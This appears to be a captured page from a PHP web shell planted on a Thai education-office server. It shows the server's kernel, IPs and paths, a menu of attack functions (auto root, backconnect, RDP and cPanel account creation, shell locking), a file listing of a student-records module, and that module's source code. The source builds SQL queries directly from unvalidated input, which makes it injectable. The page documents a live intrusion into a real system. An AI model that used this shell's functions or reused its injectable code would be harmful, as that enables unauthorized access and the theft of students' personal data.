Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
modules /
student_main /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
install
[ DIR ]
drwxr-xr-x
manual
[ DIR ]
drwxr-xr-x
picture
[ DIR ]
drwxrwxrwx
upload
[ DIR ]
drwxrwxrwx
default.php
248
B
-rwxr-xr-x
ed_year.php
10.65
KB
-rwxr-xr-x
export_test.php
930
B
-rw-r--r--
export_to_excel.php
3.08
KB
-rwxr-xr-x
export_to_excel2.php
3.03
KB
-rwxr-xr-x
getxml_student.php
14.36
KB
-rw-r--r--
getxml_student.phpOLD
11.7
KB
-rwxr-xr-x
getxml_student2.php
9.39
KB
-rw-r--r--
index.php
258
B
-rwxr-xr-x
livesearch.php
625
B
-rwxr-xr-x
livesearch_2.php
640
B
-rwxr-xr-x
livesearch_3.php
629
B
-rwxr-xr-x
livesearch_mobile.php
630
B
-rwxr-xr-x
menu.php
5.64
KB
-rwxr-xr-x
menu_mobile.php
932
B
-rwxr-xr-x
permission.php
8.45
KB
-rwxr-xr-x
permission_sch.php
8.83
KB
-rwxr-xr-x
permission_sch_khet.php
13.49
KB
-rwxr-xr-x
return_permission_sch_khet.php
779
B
-rwxr-xr-x
student_getxml.php
2.51
KB
-rwxr-xr-x
student_getxml2.php
3.1
KB
-rwxr-xr-x
student_import.php
6.72
KB
-rwxr-xr-x
student_import2.php
8.26
KB
-rw-r--r--
student_import3.php
4.35
KB
-rw-r--r--
student_import_2.php
6.67
KB
-rw-r--r--
student_importx.php
6.36
KB
-rwxr-xr-x
student_khet_update.php
34.99
KB
-rwxr-xr-x
student_num.php
10.17
KB
-rw-r--r--
student_report1.php
14.48
KB
-rwxr-xr-x
student_report1_mobile.php
12.93
KB
-rwxr-xr-x
student_report2.php
9.46
KB
-rwxr-xr-x
student_report3.php
7.82
KB
-rwxr-xr-x
student_report4.php
10.73
KB
-rw-r--r--
student_report5.php
9.17
KB
-rw-r--r--
student_sch_update.php
25.93
KB
-rwxr-xr-x
student_tranfer.php
4.2
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : getxml_student2.php
<?php error_reporting(0); defined( '_VALID_' ) or die( 'Direct Access to this location is not allowed.' ); $sql_edyear = "select * from student_main_edyear where year_active='1'"; $dbquery_edyear = mysqli_query($connect,$sql_edyear); $result_edyear=mysqli_fetch_array($dbquery_edyear); $amss_ed_year=$result_edyear['ed_year']; $rec_date = date("Y-m-d"); if(!(isset($_POST['urlGET']))){ echo "<br />"; echo "<table width='90%' border='0' align='center'>"; echo "<tr align='center'> <td align=center><font color='#990000' size='3'><strong>เป็นการเรียกข้อมูลจาก SMSS ตรวจสอบกับ AMSS++ หากไม่พบจะบันทึกใน AMSS++</strong></font> </td></tr>"; echo "</table>"; echo "<form method='post' action='' id='frm1' name='frm1'>"; echo "<table align='center'>"; echo "<tr>"; echo "<td>"; $sql = "select * from system_sync_smss_2 left join system_school on system_sync_smss_2.office_code=system_school.school_code order by system_school.school_type,system_school.school_code"; $dbquery = mysqli_query($connect,$sql); $ROW=1; $COLUMN=1; echo "<fieldset>"; echo "<legend> <B>เลือกสถานศึกษา</B>: <input type='checkbox' name='allchk' id='allchk' onclick='CheckAll2()'>เลือกทั้งหมด</legend>"; echo "<table>"; $N=0; While ($result = mysqli_fetch_array($dbquery)){ $sync_code=$result['sync_code']; $sync_code2=md5($sync_code); if($ROW==1){ echo "<tr>"; } echo "<td><input type='checkbox' name='chk' onclick='Check()'>$result[school_code] $result[school_name]"; echo "<input type='hidden' name='urlGET[]' value='$result[school_code]' disabled>"; echo "</td>"; if($COLUMN==4){ echo "</tr>"; $COLUMN=0; $ROW=0; } $ROW++; $COLUMN++; $N++; } echo "</table>"; echo "</fieldset>"; echo "</td>"; echo "</tr>"; echo "</table>"; echo "<br />"; echo "<div align='center'><input type='submit'></div>"; echo "</form>"; } //end if !(isset) if(isset($_POST['urlGET'])){ $urlGET=$_POST['urlGET']; ; $requester_server_id = $_SERVER["SERVER_ADDR"]; echo "<form id='frm1' name='frm1'>"; foreach ($urlGET as &$value) { $school_code= $value; $sql_sync = "select * from system_sync_smss_2 where office_code='$school_code'"; $dbquery_sync = mysqli_query($connect,$sql_sync); $result_sync = mysqli_fetch_array($dbquery_sync); $smss_url=$result_sync['smss_url']; $sync_code=$result_sync['sync_code']; $url ="$smss_url"."export/xml.php?username=amssplus&password=$sync_code&requester_server_id=$requester_server_id&order=student"; $xmlDoc = new DOMDocument(); $xmlDoc->load($url); $announce = $xmlDoc->getElementsByTagName('item'); $warning=base64_decode($xmlDoc->getElementsByTagName('warning')->item(0)->nodeValue); if($warning!="1"){ echo "<br>"; echo "<div align='center'>"; echo $warning; echo "</div>"; } //ตรวจสอบการเข้าถุึงเว็บsmss $smss_fond="0"; if($warning!=""){ $smss_fond="1"; } if($smss_fond=="0"){ $smss_url = explode("?",$url); echo "<br>"; echo "<div align='center'>"; echo "ไม่สามารถเข้าถึง".$smss_url[0]; echo "</div>"; } if($warning==1 and $smss_fond=="1"){ echo "<br />"; echo "<table align='center' width='65%' border='0'>"; echo "<tr><td align='center'><b>รายชื่อนักเรียนที่ต้องแก้ไขในระบบ SMSS "; $school_code=base64_decode($xmlDoc->getElementsByTagName('office_code')->item(0)->nodeValue); echo base64_decode($xmlDoc->getElementsByTagName('school_name')->item(0)->nodeValue); echo " "; echo $school_code; echo " ปีการศึกษา "; echo base64_decode($xmlDoc->getElementsByTagName('ed_year')->item(0)->nodeValue); echo "</b></td></tr>"; echo "</table>"; echo "<table align='center' width='70%' border='1' borderColor='#FF0033' style='border-collapse: collapse'>"; echo "<tr align='center' bgcolor='#FBD562'><td width='70'>ที่</td><td>เลขประจำตัวประชาชน</td><td>คำนำหน้าชื่อ</td><td>ชื่อ</td><td>นามสกุล</td><td width='50'>รหัสชั้น</td><td>ชั้น</td></tr>"; $i=1; $student_num=0; $insert_num=0; foreach ($announce as $ann) { if(($i%2) == 0) $color="#FFFFFF"; else $color="#FFFFFF"; $ed_year=base64_decode($xmlDoc->getElementsByTagName('ed_year')->item(0)->nodeValue); $school_name=base64_decode($xmlDoc->getElementsByTagName('school_name')->item(0)->nodeValue); $student_id=base64_decode($ann->getElementsByTagName('student_number')->item(0)->nodeValue); $person_id=base64_decode($ann->getElementsByTagName('person_id')->item(0)->nodeValue); $prename=base64_decode($ann->getElementsByTagName('prename')->item(0)->nodeValue); $name=base64_decode($ann->getElementsByTagName('student_name')->item(0)->nodeValue); $surname=base64_decode($ann->getElementsByTagName('student_surname')->item(0)->nodeValue); $sex=base64_decode($ann->getElementsByTagName('sex')->item(0)->nodeValue); $classlevel=base64_decode($ann->getElementsByTagName('class_now')->item(0)->nodeValue); $classroom=base64_decode($ann->getElementsByTagName('room')->item(0)->nodeValue); $class_name=base64_decode($ann->getElementsByTagName('class_name')->item(0)->nodeValue); $person_id=trim($person_id); $remark=""; $free_count=substr_count($person_id," "); if($free_count>=1){ $remark="<font color='#FF0040'>***มีช่องว่าง</font>"; } $line_count=substr_count($person_id,"-"); if($line_count>=1){ $remark="<font color='#FF0040'>***มี-</font>"; } $person_id_len=strlen($person_id); if($person_id_len!=13){ $remark="<font color='#FF0040'>***จำนวนหลักไม่ถูกต้อง</font>"; } if($remark==""){ $sql = "select id from student_main_main where person_id='$person_id' and ed_year='$ed_year' and school_code='$school_code' "; $dbquery = mysqli_query($connect,$sql); $row_num=mysqli_num_rows($dbquery); if($row_num<1){ //ตรวจสอบกับโรงเรียนอื่น $sql2 = "select id from student_main_main where person_id='$person_id' and ed_year='$ed_year' and school_code!='$school_code' "; $dbquery2 = mysqli_query($connect,$sql2); $row_num2=mysqli_num_rows($dbquery2); if($row_num2<1){ if($sex==1){ $sex="ช"; } else if($sex==2){ $sex="ญ"; } $sql = "insert into student_main_main(ed_year,school_code,student_id,person_id,prename,name,surname,sex,school_name,classlevel,classroom,rec_date,officer,ref_id,disable,status) values ('$ed_year','$school_code','$student_id','$person_id','$prename','$name','$surname','$sex','$school_name','$classlevel','$classroom','$rec_date','$_SESSION[login_user_id]','','0','0')"; if($dbquery = mysqli_query($connect,$sql)){ $insert_num++; } } else{ $sql3 = "select school_name from student_main_main where person_id='$person_id' and ed_year='$ed_year' and school_code!='$school_code' "; $dbquery3 = mysqli_query($connect,$sql3); $result3=mysqli_fetch_array($dbquery3); if($result3){ $sch_name=$result3['school_name']; $remark="<font color='#FF0040'>***มีรายชื่ออยู่โรงเรียนอื่น($sch_name)</font>"; } } } } //end if remark=="" $student_num++; if($remark!=""){ echo "<tr bgcolor=$color align='center'>"; echo "<td align='center'>$i</td>"; echo "<td align='center'>"; echo $remark; echo $person_id; echo "</td>"; echo "<td align='left'>"; echo $prename; echo "</td>"; echo "<td align='left'>"; echo $name; echo "</td>"; echo "<td align='left'>"; echo $surname; echo "</td>"; echo "<td>"; echo $classlevel; echo "</td>"; echo "<td>"; echo $class_name; echo "</td>"; $i++; echo "</tr>"; } //if remark!="" } //end foreach student echo "</table>"; echo " จำนวนนักเรียน SMSS $student_num คน "; echo "<br>"; echo " บันทึกข้อมูลในระบบ AMSS++ $insert_num คน"; echo "<br>"; } //end foreach school } //if not warning echo "<br>"; echo "</form>"; unset($value); // break the reference with the last element } ?> <script> function Check() { var x = document.getElementsByName("chk"); var y = document.getElementsByName("urlGET[]"); var i; for (i = 0; i < x.length; i++) { if (x[i].name == "chk") { if(x[i].checked == true){ y[i].disabled=false; } if(x[i].checked == false){ y[i].disabled=true; } } } } function goto_url(val){ callfrm("?option=student_main&task=getxml_student2&index=4"); } function CheckAll2() { var x = document.getElementsByName("chk"); var y = document.getElementsByName("urlGET[]"); for (var i = 0; i < document.frm1.chk.length; i++) { var e = document.frm1.chk[i]; e.checked = document.frm1.allchk.checked; if (x[i].name == "chk") { if(x[i].checked == true){ y[i].disabled=false; } if(x[i].checked == false){ y[i].disabled=true; } } } } </script>
Close
